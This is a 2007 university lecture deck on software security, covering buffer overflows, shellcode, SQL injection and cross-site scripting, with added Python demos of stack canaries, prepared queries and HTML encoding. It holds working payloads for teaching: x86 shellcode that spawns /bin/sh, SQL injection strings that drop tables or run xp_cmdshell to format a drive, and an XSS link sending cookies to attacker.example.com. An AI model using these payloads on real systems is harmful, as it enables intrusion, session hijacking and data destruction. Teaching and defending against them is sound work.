April 26, 2007 Centre College: Software Security
Software Security
Have You Ever Written a Security Bug?
Charles Frank
• Department of Computer Science
• Northern Kentucky University
• http://www.nku.edu/~frank
What We Don’t Know
“Have you ever written a program section with a security hole? How do you know?”
Mark G. Graff & Kenneth R. van Wyk
A Growing Problem
[Chart: Software Vulnerabilities by Year, 1995 to 2006; x-axis Year, y-axis Vulnerabilities (0 to 9000)]
Traditional Security is Reactive
• Perimeter defense (firewalls)
• Intrusion detection
• Over-reliance on cryptography
• Penetrate & patch
• Penetration testing
What is web application security?
It’s more than just cryptography.
– SSL won’t solve all your problems.
It’s more than securing the web server.
– Web applications have their own problems.
It’s more than application firewalls.
– Firewall can’t know every safe action at every possible state in your application.
Firewalls don’t protect web apps
[Diagram: Web Client → Firewall (Port 80, HTTP traffic passes through) → Web Server → Application → Database Server]
Penetrate and Patch
Discover flaws after deployment. Often by attackers.
Users may not deploy patches.
Patches may have security flaws (15%?)
Patches are maps to vulnerabilities. Attackers reverse engineer to create attacks.
The Problem is Software
“We wouldn’t have to spend so much time and effort on network security if we didn’t have such bad software security”
Bruce Schneier
“Applied Cryptography”
“Secrets & Lies: Digital Security in a Networked World”
Hackers
“Malicious hackers don’t create security holes; they simply exploit them. Security holes and vulnerabilities – the real root cause of the problem – are the result of bad software design and implementation.”
John Viega & Gary McGraw
Developers Aren’t Ready
“64% of developers are not confident in their ability to write secure applications”
Bill Gates, RSA 2005
Industry Problem
• There is no software liability – no incentive for secure software
• Most developers never learned to produce secure code
• Because of competition and cost considerations, software is produced under severe time constraints.
Developer’s Education
• Most programming courses ignore secure software development
• Most software engineering courses ignore secure software engineering
Complexity
• Software products are growing in size
• Windows XP has 40 million lines of code
• 5-50 bugs per KLOC
• 10% of bugs result in security faults
• 40,000 KLOC * 5 * 10% = 25,000 security bugs
• Software is often written in low level languages such as C/C++
Security Problems
SECURITY BUGS (50%)
• Buffer overflow
• Command injection
• Cross-site scripting
• Integer overflow
• Race condition
• Untrusted input
ARCHITECTURAL FLAWS (50%)
• Cryptography misuse
• Lack of compartmentalization
• More privilege than necessary
• Relying on secret algorithms
• Sharing resources
• Usability problems
Essential Facts
Software Security ≠ Security Features
Cryptography will not make you secure.
Application firewalls will not provide security.
50/50 Architecture/Coding Problems
An Emergent Property of Software, Like Usability or Reliability
Not a Feature
Software Security Practices
1. Code Reviews
2. Risk Analysis
3. Penetration Testing
4. Security Testing
5. Abuse Cases
6. Security Operations
[Diagram: the six practices (Abuse Cases, Risk Analysis, Code Reviews + Static Analysis, Penetration Testing, Security Testing, Security Operations) placed along the lifecycle Requirements → Design → Coding → Testing → Maintenance]
Software Vulnerabilities
1. Malicious Client
2. Buffer Overflow
3. SQL Injection
4. Cross-site Scripting
5. Format String
6. Race Condition
7. Information Leakage
8. Path Traversal
9. Command Injection
10. Integer Overflow
11. PHP Include
Malicious Client
• Developers can mistakenly trust data from a client in server-side code
• Attackers can take advantage of this trust
• Security tester’s job is to violate the data specifications to find security vulnerabilities
Manipulate Network Requests
• Write a client to send custom requests
– Might modify the client code to send malformed requests
• Use a proxy to receive network traffic from a client and modify it to send it to the server.
– Firefox Add-on “Tamper Data”
– WebScarab from OWASP
Tamper Data
• Firefox Browser Add-on
• Google for Tamper Data
• Tools | Tamper Data
Buffer Overflow Topics
1. What is a Buffer Overflow?
2. Buffer Overflow Examples
3. Program Stacks
4. Smashing the Stack
5. Shellcode
6. Mitigations
Buffer Overflows
A program accepts too much input and stores it in a fixed length buffer that’s too small.
char A[8];
short B;
gets(A);
Memory before gets(A) reads its input:
A A A A A A A A B B
0 0 0 0 0 0 0 0 0 3
Memory after gets(A) has read "overflows" (9 characters plus the terminating 0):
A A A A A A A A B B
o v e r f l o w s 0
Buffer Overflow Examples
Morris Worm
Took down most of the Internet in 1988.
Exploited a buffer overflow in fingerd.
Subsequent worms used overflow attacks too.
MS07-004: Internet Explorer
Buffer overflow in VML.
Allows remote code execution.
Not the first overflow in IE or other browsers.
Buffer Overflow Example #1
What’s the mistake in this program?
#include <stdio.h>
int main() {
    int array[5] = {1, 2, 3, 4, 5};
    printf("%d\n", array[5]);
}
Program output:
> gcc -o buffer buffer.c
> ./buffer
7077876
Buffer Overflow Example #2
Writing beyond the buffer:
int main() {
    int array[5] = {1, 2, 3, 4, 5};
    int i;
    for (i = 0; i <= 255; ++i)
        array[i] = 41;
}
Program output:
> gcc -o bufferw bufferw.c
> ./bufferw
Segmentation fault (core dumped)
What happened to our program?
The buffer overflow:
Overwrote memory beyond buffer with 41.
Memory page was not writable by program.
OS terminated prog with segmentation fault.
Do overflows always produce a crash?
Most of the time, yes.
Careful attacker can access valid memory.
Why do programmers keep making the same mistake?
C/C++ inherently unsafe.
No bounds checking.
Unsafe library functions: strcpy(), sprintf(), gets(), scanf(), etc.
Java, Python largely immune.
C/C++ gains performance by not checking.
Stack at Function Start (highest address at top)
old stack frame
parameter #N
…
parameter #1
return address
old FP ← Frame Pointer
local vars ← Stack Pointer (at the low end of the locals)
Shellcode
Shellcode is machine code that starts a command shell. With a shell, you can run any command.
Shellcode
Shellcode in C.
#include <unistd.h>
int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = 0x0;
    execve(name[0], name, 0x0);
}
Running the program.
> gcc -ggdb -static -o shell shellcode.c
> ./shell
sh-3.00$ exit
From C to Machine Language
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() {
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}
> gcc -o testsc2 testsc2.c
> ./testsc2
sh-3.00$ exit
Writing an Exploit
1. Construct shellcode to inject.
2. Find exploitable buffer in a program.
3. Estimate address of buffer.
4. Run program with an input that:
   1. Injects shellcode into stack memory.
   2. Overwrites return address with address of your shellcode.
Compiler Defenses: Canaries
Goal: Detect altered return addresses.
Method: Compiler changes stack layout.
Adds canary to stack when function called.
Must overwrite canary to change return addr.
Checks canary before function returns.
Terminate program if canary modified.
Canaries are random to prevent guessing.
Visual Studio 2005 and gcc 4.1 use canaries.
Canary Stack Layout (highest address at top)
old frame
param2
param1
return address
saved EBP
canary value
local vars
Buffer Overflow: Key Points
Buffer overflow attacks.
– C/C++ perform no bounds checking.
– There is no difference between code and data.
– Smashing the stack.
Mitigating buffer overflows.
– Use a language with bounds checking.
– Check your own bounds in C/C++.
– Use safe functions, string libraries.
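The gets(A) corruption from the Buffer Overflows slide and the canary check from the Compiler Defenses slide, as an added Python model that is not part of the original slides. The frame layout follows the slides' diagrams (locals, canary, saved FP, return address, low to high); the canary value, the return address 0x08048456 and both inputs are constructed for the demo.

```python
import os
import struct

WORD = 4                              # 32-bit words, as in the slides' stack diagrams
SAFE_RET = 0x08048456                 # constructed "real" return address
FIXED_CANARY = b"\x00\x0a\xff\x0d"    # fixed so the demo repeats; gcc picks a random one

# Constructed inputs. LONG_INPUT is longer than the 16-byte local buffer: 16 bytes
# fill the buffer, 4 land on the canary, 4 on the saved FP, 4 on the return address.
SHORT_INPUT = b"hello"
LONG_INPUT = b"A" * 16 + b"BBBB" + b"CCCC" + struct.pack("<I", 0x41414141)


class StackFrame:
    """Simulated frame, low address first: [local buf][canary][saved FP][return addr]."""

    def __init__(self, buf_size, ret_addr, canary=None):
        self.buf_size = buf_size
        self.canary = canary if canary is not None else os.urandom(WORD)
        self.mem = (bytearray(buf_size) + self.canary
                    + bytearray(WORD) + struct.pack("<I", ret_addr))
        self.frame_len = len(self.mem)

    def unsafe_gets(self, data):
        """gets()-style copy: no bound, so bytes past buf_size overwrite the neighbours."""
        data = (data + b"\x00")[:self.frame_len]     # clamp to the modelled frame
        self.mem[:len(data)] = data

    def safe_fgets(self, data):
        """fgets(buf, sizeof buf)-style copy: at most buf_size-1 bytes plus a NUL."""
        data = data[:self.buf_size - 1] + b"\x00"
        self.mem[:len(data)] = data

    def canary_intact(self):
        return bytes(self.mem[self.buf_size:self.buf_size + WORD]) == self.canary

    def return_address(self):
        off = self.buf_size + 2 * WORD
        return struct.unpack("<I", self.mem[off:off + WORD])[0]

    def epilogue(self):
        """What a canary-protected function epilogue does: check, then return."""
        if not self.canary_intact():
            raise RuntimeError("*** stack smashing detected ***")
        return self.return_address()


def run(data, bounded):
    """Feed data to a frame with a 16-byte buffer using an unbounded or bounded
    copy; returns (canary intact, return address reached, program aborted)."""
    frame = StackFrame(16, SAFE_RET, FIXED_CANARY)
    (frame.safe_fgets if bounded else frame.unsafe_gets)(data)
    try:
        ret, aborted = frame.epilogue(), False
    except RuntimeError:
        ret, aborted = frame.return_address(), True
    return frame.canary_intact(), hex(ret), aborted


if __name__ == "__main__":
    print("short input, gets()  :", run(SHORT_INPUT, bounded=False))
    print("long input, gets()   :", run(LONG_INPUT, bounded=False))
    print("long input, fgets()  :", run(LONG_INPUT, bounded=True))
```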
SQL Injection
1. App sends form to user.
2. Attacker submits form with SQL exploit data.
3. Application builds string with exploit data.
4. Application sends SQL query to DB.
5. DB executes query, including exploit, sends data back to application.
6. Application returns data to user.
[Diagram: Attacker → Firewall → Web Server → DB Server; login form with fields User and Pass, Pass = ' or 1=1--]
SQL Injection in PHP
$link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: " . mysql_error());
mysql_select_db($DB_DATABASE);
$query = "select count(*) from users where username = '$username' and password = '$password'";
$result = mysql_query($query);
SQL Metacharacters
' quotes parameters
; separates commands
-- comments
%, _ glob in LIKE clause
%, _, *, +, |, [], () used for regular expressions in SIMILAR TO clause
SQL Injection Attack #1
Unauthorized Access Attempt:
password = ' or 1=1 --
SQL statement becomes:
select count(*) from users where username = 'user' and password = '' or 1=1 --
Checks if password is empty OR 1=1, which is always true, permitting access.
SQL Injection Attack #2
Database Modification Attack:
password = foo'; delete from table users where username like '%
Database executes two SQL statements:
select count(*) from users where username = 'user' and password = 'foo'
delete from table users where username like '%'
Impact of SQL Injection
SELECT SSN FROM USERS WHERE UID='$UID'
INPUT | RESULT
5 | Returns info for user with UID 5.
' OR 1=1-- | Returns info for all users.
' UNION SELECT Field FROM Table WHERE 1=1-- | Returns all rows from another table.
';DROP TABLE USERS-- | Deletes the users table.
';master.dbo.xp_cmdshell 'cmd.exe format c: /q /yes' -- | Formats the C: drive of the database server if you’re running MS SQL Server and extended procedures aren’t disabled.
Solution: Prepared Queries
require_once 'MDB2.php';
$mdb2 =& MDB2::factory($dsn, $options);
if (PEAR::isError($mdb2)) {
die($mdb2->getMessage());
}
$sql = "SELECT count(*) from users where username = ? and password = ?";
$types = array('text', 'text');
// A SELECT returns a result set, so prepare it with MDB2_PREPARE_RESULT;
// MDB2_PREPARE_MANIP is for INSERT/UPDATE/DELETE and execute() would only return a row count.
$sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_RESULT);
$data = array($username, $password);
$result = $sth->execute($data);
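The PHP login query from the SQL Injection in PHP slide and the ' or 1=1 -- bypass from Attack #1, side by side with the prepared-query fix, as an added Python example that is not from the original slides. The users table, its two rows and the passwords are constructed; sqlite3 stands in for MySQL, and its ? placeholders bind values the same way the MDB2 prepared query does.

```python
import sqlite3

# Constructed users table standing in for the slides' MySQL 'users' table.
USERS = [("user", "s3cret"), ("alice", "hunter2")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table users (username text, password text)")
    db.executemany("insert into users values (?, ?)", USERS)
    return db


def login_vulnerable(db, username, password):
    """The PHP slide's query, built by string interpolation. Returns
    (logged in?, the SQL actually sent) so the injected text is visible."""
    query = ("select count(*) from users where username = '%s' and password = '%s'"
             % (username, password))
    count = db.execute(query).fetchone()[0]
    return count > 0, query


def login_prepared(db, username, password):
    """Prepared query with bound parameters, as in the MDB2 slide: the values
    travel separately from the SQL text, so quotes in them are just data."""
    query = "select count(*) from users where username = ? and password = ?"
    count = db.execute(query, (username, password)).fetchone()[0]
    return count > 0


def compare(username, password):
    """Run one submission through both versions; returns (vulnerable, prepared)."""
    db = make_db()
    vulnerable, _ = login_vulnerable(db, username, password)
    return vulnerable, login_prepared(db, username, password)


if __name__ == "__main__":
    db = make_db()
    for pw in ("s3cret", "wrong", "' or 1=1 --"):
        ok, sql = login_vulnerable(db, "user", pw)
        print("vulnerable:", ok, "<-", sql)
        print("prepared  :", login_prepared(db, "user", pw))
```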
Cross Site Scripting Attacks (XSS)
• Run Javascript in the victim’s browser
– <script>alert('XSS');</script>
• Get the user’s cookie for the Web site to display – perhaps revealing the session ID
– <script>alert(document.cookie);</script>
• Steal the cookie and hijack the user’s session
– Craft a request to the attacker’s machine with the cookie as part of the file name, e.g. for an image source.
Reflected XSS Attacks
Server side code takes script in user input and echoes the script back to run on the user machine.
Example
Request:
http://server/search.aspx?keyword=<SCRIPT>alert("Running!")</SCRIPT>
Page returned:
<BODY><H1>Search Results</H1>for =<SCRIPT>alert("Running!")</SCRIPT><h2>Sorry, no results were found for.</h2>
Exploiting an XSS Bug
• Attacker must trick the user into running the URL with the query string.
• Send a user an email with a link to a Web site
• http://server/search.aspx?keyword=<SCRIPT>document.location="http://attacker.example.com/default.aspx?%2Bescape(document.cookie);"</SCRIPT>
Anatomy of an XSS Attack
[Diagram with three parties: Attacker, User, Web Server]
1. User logs in to the Web Server.
2. Web Server returns a cookie.
3. Attacker sends the XSS attack (link) to the User.
4. User clicks on XSS link.
5. Browser sends the XSS URL to the Web Server.
6. Web Server returns the page with injected code.
7. Browser runs injected code; Evil Site saves cookie.
8. Attacker uses stolen cookie to hijack user session.
Exploiting POST
<body>
<%
dim strName: strName = Request.Form("myName")
if strName = "" then
%>
<form method="POST" name="myForm">
Name: <input type="text" name="myName">
<input type="submit" value="Submit">
</form>
</body></html>
<%
Response.End
Else
Response.Write "Hello, " & strName & ". Nice to meet you."
End If
%>
</body>
What should we enter for Name?
<SCRIPT>alert('XSS!')</SCRIPT>
Getting the Victim to Submit Malicious POST
Attackers can trick victims into sending the script data in the POST by hosting the form that asks for the user’s name on the attacker’s Web site. The attacker can pre-populate the Name field with the script that exploits the XSS vulnerability.
Testing
• Save the Web page to your site.
• <form method="POST" name="myForm" action="http://VulnerableWebSite/helloPostDemo.asp">
• <input type="text" name="myName" value="<SCRIPT>alert('Hi!')</SCRIPT>">
Automatically Submitting
<body>
….
<SCRIPT>Form.submit();</SCRIPT>
Persistent XSS Attack
• Put <script>alert('Hi!')</script> into a guestbook entry.
• View the guestbook entries page again.
Stopping XSS Attacks
• Encode HTML of attacker’s input before returning it to the browser.
• Problem: Blogs may want users to use HTML. Block the script tag?
Original Character | HTML Encoded
< | &lt;
> | &gt;
& | &amp;
" | &quot;
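The encoding table above applied to the search.aspx example from the Reflected XSS slides, as an added Python example that is not from the original slides. It extends the table with the single quote because the injection on the Events slide that follows breaks out of a single-quoted attribute, which the four entries alone would not stop; the page markup and the sample inputs are constructed.

```python
# Entity table from the slide, plus the single quote (an addition, see lead-in).
ENTITIES = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;"}


def encode_html(text):
    """Encode every metacharacter in one pass. A per-character lookup never
    re-encodes the '&' of an entity it has just produced."""
    return "".join(ENTITIES.get(ch, ch) for ch in text)


def search_page_unsafe(keyword):
    """The search.aspx response from the Example slide: input echoed verbatim."""
    return ("<BODY><H1>Search Results</H1>for =%s"
            "<h2>Sorry, no results were found for.</h2>" % keyword)


def search_page_safe(keyword):
    """Same page with the keyword encoded before it is written into the HTML."""
    return ("<BODY><H1>Search Results</H1>for =%s"
            "<h2>Sorry, no results were found for.</h2>" % encode_html(keyword))


def text_input_safe(value):
    """The INPUT tag from the Events slide, with the value attribute encoded so
    a quote in the data cannot end the attribute and start an onclick handler."""
    return "<INPUT name=\"txtInput2\" type=\"text\" value='%s'>" % encode_html(value)


def has_script_tag(html):
    """Crude check used only for the demo: does a raw <script tag survive?"""
    return "<script" in html.lower()


# Constructed sample inputs
SAMPLE_SCRIPT = '<SCRIPT>alert("Running!")</SCRIPT>'
SAMPLE_ATTR_BREAKOUT = "' onclick=alert('Hi') junk='"

if __name__ == "__main__":
    print(search_page_unsafe(SAMPLE_SCRIPT))
    print(search_page_safe(SAMPLE_SCRIPT))
    print(text_input_safe(SAMPLE_ATTR_BREAKOUT))
```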
Events
• Most tags have events
<INPUT name="txtInput2" type="text" value = ' OurData' onclick=alert('Hi') junk=''>
• When the user clicks on the text box the onclick event will fire.
Microsoft ASP.NET
• When ValidateRequest property is enabled, the query string and POST data are inspected.
• Suspicious data, such as <script> and onload=, cause an exception to be thrown.
Identifying XSS Vulnerabilities
1. Identify where user data is supplied.
2. Send valid-looking data to the application.
3. Verify whether any of the data is returned to the Web browser.
4. Find ways to force the victim to send data and have it run as a script on the client machine.
Knowledge
SPI Dynamics White papers
– http://www.spidynamics.com/spilabs/education/whitepapers.html
– Blind SQL Injection
– Cross Site Scripting
OWASP Web Goat
Teaches Web application security through a series of lessons.
http://www.owasp.org/index.php/OWASP_WebGoat_Project
Lesson Plans
http://www.owasp.org/index.php/Lesson_Plans